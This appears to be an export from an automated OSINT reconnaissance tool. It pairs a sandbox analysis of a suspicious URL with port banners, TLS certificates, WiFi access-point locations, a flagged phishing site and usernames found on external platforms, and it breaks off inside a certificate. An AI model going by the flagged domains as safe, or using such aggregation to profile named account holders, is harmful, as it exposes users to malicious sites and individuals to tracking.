| 2023-05-12 02:56:38 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 4, u'threat_score': None, u'compromised_hosts': [u'104.196.30.220', u'172.67.128.152'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://regclickonetwoget.com/?qs=SVI3JJKW8KWM1XICHGSM-41fb87317e87a7486e', u'signatures': [{u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-101', u'name': u'Found API related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"MaxConnectionsPerServer" (Indicator: "MaxConnectionsPerServer") in Source: 00000000-00002536-00000BCA-24571201\n "MaxConnectionsPer1_0Server" (Indicator: "MaxConnectionsPer1_0Server") in Source: 00000000-00002536-00000BCA-24572342'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-2', u'name': u'An application crash occurred', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 0, u'type': 9, u'description': u'Report process "WerFault.exe" was created by "rundll32.exe"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3360 -s 132" (UID: 00000000-00003436)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, 
u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"e1.o.lencr.org"\n "facesupdates.com"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "WerFault.exe" (UID: 00000000-00003436) was launched with missing environment variables: "PATH"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFF57.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_9e8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "DBWinMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_9e8_IESQMMUTEX_0_303"\n "IsoScope_9e8_IESQMMUTEX_0_519"\n "IsoScope_9e8_IE_EarlyTabStart_0xd54_Mutex"\n "IsoScope_9e8_IESQMMUTEX_0_331"\n "IsoScope_9e8_ConnHashTable<2536>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2536"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n 
"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "172.67.128.152:443"\n "23.32.45.191:80"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3360 -s 132" (UID: 00000000-00003436)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabFF56.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00000812]\n "CLXG2BM2.txt" has type 
"ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CLXG2BM2.txt]- [targetUID: 00000000-00002536]\n "CabFF56.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\CabFF56.tmp]- [targetUID: 00000000-00000812]\n "BBB0B9C986171FE6F65C60CFDD8B124F" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BBB0B9C986171FE6F65C60CFDD8B124F]- [targetUID: 00000000-00000812]\n "~DF71962694B43492EC.TMP" has type "data"- Location: [%TEMP%\\~DF71962694B43492EC.TMP]- [targetUID: 00000000-00002536]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002536]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002536]\n "BE2B512E0EA306BAD5DC86CC33D62C85" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BE2B512E0EA306BAD5DC86CC33D62C85]- [targetUID: 00000000-00000812]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00000812]\n "93BCFOQ7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\93BCFOQ7.txt]- [targetUID: 00000000-00002536]\n "90MZUOV9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\90MZUOV9.txt]- [targetUID: 00000000-00002536]\n "1B1495DD322A24490E2BF2FAABAE1C61" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\1B1495DD322A24490E2BF2FAABAE1C61]- [targetUID: 00000000-00000812]\n 
"6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002536]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002536]\n "9MS61IBX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9MS61IBX.txt]- [targetUID: 00000000-00002536]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00000812]\n "103621DE9CD5414CC2538780B4B75751" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\103621DE9CD5414CC2538780B4B75751]- [targetUID: 00000000-00000812]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://regclickonetwoget.com/?qs=SVI3JJKW8KWM1XICHGSM-41fb87317e87a7486e"- [Source: Input]\n Pattern match: "https://regclickonetwoget.com"- [Source: Input]\n Heuristic match: "e1.o.lencr.org"- [Source: PCAP]\n Heuristic match: "GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBTvkAFw3ViPKmUeIVEf3NC7b1ErqwQUWvPtK%2Fw2wjd5uVIw6lRvz1XLLqwCEgQibVTQK8A8W0dT8xq4Fb0ooQ%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: e1.o.lencr.org"- [Source: PCAP]\n Heuristic match: "facesupdates.com"- [Source: PCAP]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /Tracede/animate.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://regclickonetwoget.com/?qs=SVI3JJKW8KWM1XICHGSM-41fb87317e87a7486e\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:1 | 104.196.30.220 |
| 2023-05-12 03:43:29 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | United States | inflany.com |
| 2023-05-12 03:24:29 | Company Name | No | Company Name Extractor | 0 | 0 | 3 | 0 | None | Cloudflare\, Inc. | C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com |
| 2023-05-12 03:22:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 188.114.97.1:8443 | 188.114.97.1 |
| 2023-05-12 02:55:11 | Physical Location | No | Censys | 1 | 0 | 2 | 0 | None | Bursa, Bursa Province, 16250, Turkey, Asia | 87.248.157.102 |
| 2023-05-12 02:46:36 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | North Charleston, United States | 34.148.97.127 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | HNG (Net ID: 00:01:E3:0D:91:90) | 52.3759, 4.8975 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | HackerRank (Category: tech)
https://www.hackerrank.com/profile/login | login |
| 2023-05-12 03:41:52 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | Microsoft Windows | 45.131.109.53 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | RIA-FRANKFURT (Net ID: 00:01:E3:5C:A6:A3) | 50.1188, 8.6843 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=FXQU88yRDhEJMx%2FdYM%2F9ZMluhZXagjhG95IApBIpm7WqxobZm4CcFhtwU9d3QdUV9%2BbJoSdd48r6u2FX9%2FKZxhE4%2B1z8sAVQ0tKz2uiNE7MhIPsLxcBIQGzqQ1fObOLwdnHGyXAPA0tM\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60483bb94334-EWR"} |
| 2023-05-12 02:54:34 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5b18b39c858117-ORD
Content-Encoding: gzip
| 104.21.71.14 |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.50): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys (Net ID: 00:16:B6:2D:FB:6B) | 32.8608, -79.9746 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00x44.github.io]
https://www.openphish.com/feed.txt | 00x44.github.io |
| 2023-05-12 02:46:54 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cloudflare.com | brett.ns.cloudflare.com |
| 2023-05-12 02:57:24 | Internet Name | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | fluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c5454e7fad90297-ORD
| 188.114.96.1 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ZyXEL (Net ID: 00:02:CF:4A:E5:0D) | 40.2024, 29.0398 |
| 2023-05-12 02:44:42 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:88:80:c3:9c:e1:f5:05:d4:ce:eb:a7:b8:8b:96:69:16:e7
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 13:22:33 2023 GMT
Not After : Jun 25 13:22:32 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:bd:d7:3e:a0:44:3f:74:66:1e:5f:b3:2a:36:ad:
5d:f6:03:6b:7c:a2:a0:47:3a:fb:01:98:b1:8f:cc:
c2:91:5e:2e:be:9e:37:09:fc:a3:ca:c0:ce:59:08:
31:20:c4:42:4f:e2:31:60:c4:be:0d:a3:d0:7e:5f:
84:84:43:02:3b:79:0a:56:99:86:35:5f:ee:ec:21:
8b:06:16:ef:3b:0d:ec:b0:a6:01:ca:7c:9f:ae:0e:
21:80:e7:f6:f2:e9:02:7d:5d:df:7d:70:dd:dd:93:
90:c2:a3:7e:80:f6:ad:ed:f9:15:f2:c4:37:d6:ad:
4b:89:76:da:d5:eb:7c:ff:f8:44:95:84:d6:c3:19:
7b:70:37:49:42:e5:fe:7d:2c:bd:de:bc:2b:99:c0:
a4:9b:15:4f:d7:2f:f2:c7:b5:99:6b:e4:41:8f:a5:
3f:0f:85:1f:6c:4e:91:90:da:48:18:85:c0:a8:f9:
5b:43:e7:ba:4b:5b:17:69:9f:6a:26:1d:48:87:97:
a5:b7:a2:63:4f:58:3b:87:61:7a:53:e1:17:71:98:
3f:e6:14:b4:56:34:1d:a0:89:72:33:eb:2c:c5:36:
a0:27:b1:d2:f8:c6:e3:8f:79:67:b5:d6:8a:ec:f1:
bd:9b:ad:69:c1:3b:50:1a:84:e7:cb:cf:d0:71:43:
d2:3b:49:a5:27:2e:d1:3d:b9:18:82:02:4d:8f:b0:
bb:df:42:cf:64:aa:67:dc:2f:01:5a:31:2e:da:fb:
b2:d7:58:03:8e:aa:3f:4c:ca:46:eb:1f:d0:ce:c6:
8c:fe:3d:b8:0f:99:bb:cf:51:78:2e:f4:7a:df:b5:
ee:fc:f9:a7:d1:b7:2b:1b:c6:17:72:43:c6:34:57:
a1:d1:1d:f1:0c:8c:8a:f9:1d:27:7f:56:dc:e1:0f:
9b:fe:d2:eb:01:b7:80:25:0c:68:e6:38:d2:70:20:
00:db:75:51:f4:50:11:95:65:85:63:dc:a6:18:f5:
d8:1d:55:65:7b:fd:4b:42:c9:e0:e0:5b:99:47:62:
96:1e:29:13:2d:13:79:08:f1:19:4e:83:44:d1:b3:
1e:52:55:c8:85:91:ec:6f:74:02:73:b9:35:b5:4d:
32:70:2b:a5:40:65:f3:30:c9:2a:75:4a:fc:26:5e:
25:6b:0f:f0:6e:21:a9:a3:b3:fc:a9:24:00:c1:d2:
4b:2c:3d:0a:55:12:77:ec:d9:f9:b2:f1:bc:2c:ec:
53:cb:52:84:47:80:24:42:33:90:05:e1:7c:3a:b2:
37:ee:d5:9d:71:10:25:16:47:45:30:42:37:7d:df:
2f:44:a5:75:17:fd:0c:59:0a:14:5f:4a:c6:9e:57:
1c:e4:cb
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
EE:9A:7C:45:9F:8D:28:F8:82:DE:AE:58:A9:48:6F:F4:DA:ED:01:D8
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
a3:1a:73:71:ae:ed:9f:b5:9b:61:66:0e:f9:3c:05:e5:98:b9:
71:fe:3a:01:23:3c:a5:ed:da:b4:47:c0:62:3d:82:74:46:2d:
f3:bc:7d:58:f7:9d:a3:63:b0:c8:15:ad:b0:58:bc:d6:75:4d:
8b:28:94:cb:bc:69:7c:80:f8:cd:78:76:8f:73:94:76:90:7d:
80:5c:21:83:4e:e4:26:a7:06:a5:e9:38:47:ff:a7:5f:42:bd:
c4:d9:74:6a:33:69:46:51:e5:bd:52:74:21:07:0b:2d:14:31:
45:31:91:5d:2e:25:25:a0:10:c9:3a:3e:d7:38:78:9b:b2:aa:
22:af:71:e4:8a:d0:ec:e4:7c:b6:88:11:5f:5d:42:ee:2b:78:
b2:c8:8f:62:9a:3e:c3:a6:06:7e:f7:0b:b9:99:fa:b8:e0:42:
79:cd:64:e7:19:13:71:ab:ad:f1:90:66:20:91:56:0f:0c:e3:
48:ed:63:55:89:67:59:f7:08:9e:72:d6:2b:54:e9:5e:60:6b:
af:15:40:e4:e3:93:64:05:b5:87:bf:b5:3b:e3:0a:3e:94:9e:
a2:8e:f7:62:b7:7a:47:d1:97:14:d5:e3:c4:7b:f6:89:76:12:
8c:29:e2:6a:8d:3f:22:f5:b7:f7:82:ac:c9:19:ac:5c:cb:6e:
d1:2d:07:ab
|
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.117 | 35.229.48.116 |
| 2023-05-12 03:08:51 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.124 | 34.148.97.127 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Nesrin (Net ID: 00:02:61:71:AB:40) | 40.2024, 29.0398 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ELSA1 (Net ID: 00:02:2D:29:60:79) | 50.1188, 8.6843 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | United States | telleria.com |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.239): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:10 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 253
Connection: close
CF-RAY: -
| 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | kwejk.pl (Category: images)
https://kwejk.pl/uzytkownik/login#/tablica/ | login |
| 2023-05-12 02:55:15 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | linux | 165.232.113.85 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:20 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-1f4d\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:20 GMT", "cf-ray": "7c5f605fb97f4259-EWR", "content-type": "text/css", "x-frame-options": "DENY"} |
| 2023-05-12 03:09:34 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | 01def.io | 01def.io |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Chess.com (Category: gaming)
https://www.chess.com/member/Altpapier | Altpapier |
| 2023-05-12 03:21:08 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | wattpad (Category: social)
https://www.wattpad.com/user/dawidsulej | dawidsulej |
| 2023-05-12 02:57:09 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:d8:ac:1a:31:df:8f:f8:c7:c3:27:35:9c:31:39:5f:60:e8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 17:26:22 2022 GMT
Not After : Feb 15 17:26:21 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:b8:46:5d:ac:6d:f3:78:e1:a9:4f:74:a7:83:2a:
f1:af:bd:cc:66:b6:b9:bf:84:6f:47:9b:97:1c:a8:
c9:7d:6c:fe:9e:8e:79:9c:a5:37:f9:7d:7a:a0:3b:
dd:dd:59:27:44:ef:fa:f9:9f:ac:5e:a7:96:85:d6:
12:a4:67:16:8a:d5:1c:b5:d1:2d:4e:c7:ec:3d:19:
e5:de:7b:f7:77:77:6b:39:f5:6c:f2:bc:49:15:e4:
d9:26:16:d0:09:ff:d0:9f:cc:e1:2f:72:cd:5d:49:
42:8f:44:ab:2b:64:2c:16:15:0b:c6:a8:c4:87:48:
5c:ca:2c:13:33:5b:9e:8f:26:9e:57:1a:3f:da:51:
8d:e5:86:b3:d8:b8:bb:9b:a8:35:c1:05:df:6d:60:
e8:57:86:af:77:94:58:18:ee:4d:cc:61:8e:ef:d8:
ae:1a:ad:73:4e:d6:21:83:54:e8:94:6d:be:b2:5a:
91:8d:86:36:60:55:a8:6c:ac:42:09:7d:39:a2:a8:
c7:4d:09:67:42:98:43:91:4c:6e:9c:44:89:71:c9:
81:24:98:ab:01:48:f5:7f:9f:03:76:19:5e:40:1f:
e2:a9:ac:0e:74:15:d2:c7:02:a6:94:0f:07:1e:c2:
8f:1c:65:ac:eb:0a:21:1c:42:25:eb:b3:3c:e5:3d:
0f:68:8a:07:35:fd:f2:bf:65:bb:27:0a:28:75:d7:
36:a5:f8:ad:87:2d:4d:e9:8c:44:1c:dd:e0:1f:f8:
19:b0:d2:ba:53:d4:71:e9:68:d3:d7:47:bd:bd:b3:
12:21:a8:7f:36:dd:3a:ee:09:ec:a7:f6:99:fc:9a:
ee:64:c3:e9:cb:48:8b:5b:53:b6:9a:34:49:ed:6f:
97:8c:71:a4:8f:ff:5a:94:b4:2f:23:08:04:1f:5f:
dd:ba:07:c4:98:26:ce:e7:92:3f:eb:aa:ca:85:d1:
9e:9d:66:9d:15:94:f9:a8:c4:87:5f:d8:0f:2a:bd:
f6:c1:3a:15:a4:4a:73:81:4d:25:59:6c:74:3c:88:
be:35:3a:e2:55:b7:aa:f2:6a:84:aa:03:d7:47:36:
8c:65:79:0d:82:62:5e:32:88:98:91:5f:e7:41:ad:
df:3b:04:9a:a4:b7:e8:4a:dc:51:e1:1a:2e:5f:80:
9f:10:99:df:13:16:07:60:53:0f:70:88:4d:8b:bf:
c2:83:ad:7d:95:a6:63:06:b5:f7:e1:fa:b4:f1:f2:
59:97:a4:23:6e:6f:a1:9d:e7:91:3c:8f:96:90:d0:
88:f8:42:7e:b9:a8:0b:95:b2:4a:f1:e1:43:89:bc:
d0:c5:6e:8d:7a:6f:1a:ac:22:35:41:3f:62:4c:b0:
b4:f9:c1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D4:B4:B6:D6:64:7B:5F:1F:0F:AA:DA:BE:7B:F2:3E:AB:24:EE:4D:D7
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
12:c3:23:0c:67:c6:85:51:aa:d3:80:18:b2:65:bd:31:94:8a:
e8:5c:6a:01:d8:5d:c1:9e:5e:a1:8a:00:bf:31:a6:2d:2b:2a:
d3:2e:c1:cb:48:32:97:61:63:f9:88:e4:9c:86:57:55:70:0b:
32:91:1a:0d:37:95:fb:a7:7b:4a:02:c1:4f:b7:cf:20:cf:d1:
69:54:62:41:0e:be:38:0e:7b:77:6c:7e:42:cd:d3:80:5f:ab:
19:e5:8c:24:db:b5:99:d7:5b:1e:e0:f9:51:35:ee:2e:e0:f2:
3b:0e:28:4f:52:fb:a4:cb:e5:d4:44:71:e2:b7:97:1e:35:f2:
db:f3:26:a9:1f:bb:8d:8d:14:2e:84:1c:98:58:cd:d8:11:56:
db:34:47:2c:b7:4d:26:01:fe:51:2b:7a:54:d2:4b:ab:c8:ee:
ec:9f:45:39:6f:fe:90:a4:3d:93:8b:30:b0:a3:b3:2d:bc:f4:
ee:4f:24:be:81:68:9c:c9:32:9e:f9:8d:83:ca:11:33:39:6f:
6f:95:05:65:ef:78:3c:14:e2:53:b2:de:b5:09:28:66:eb:7a:
0b:3e:3f:89:c9:6f:58:91:18:c2:4c:16:9c:f4:c2:32:78:48:
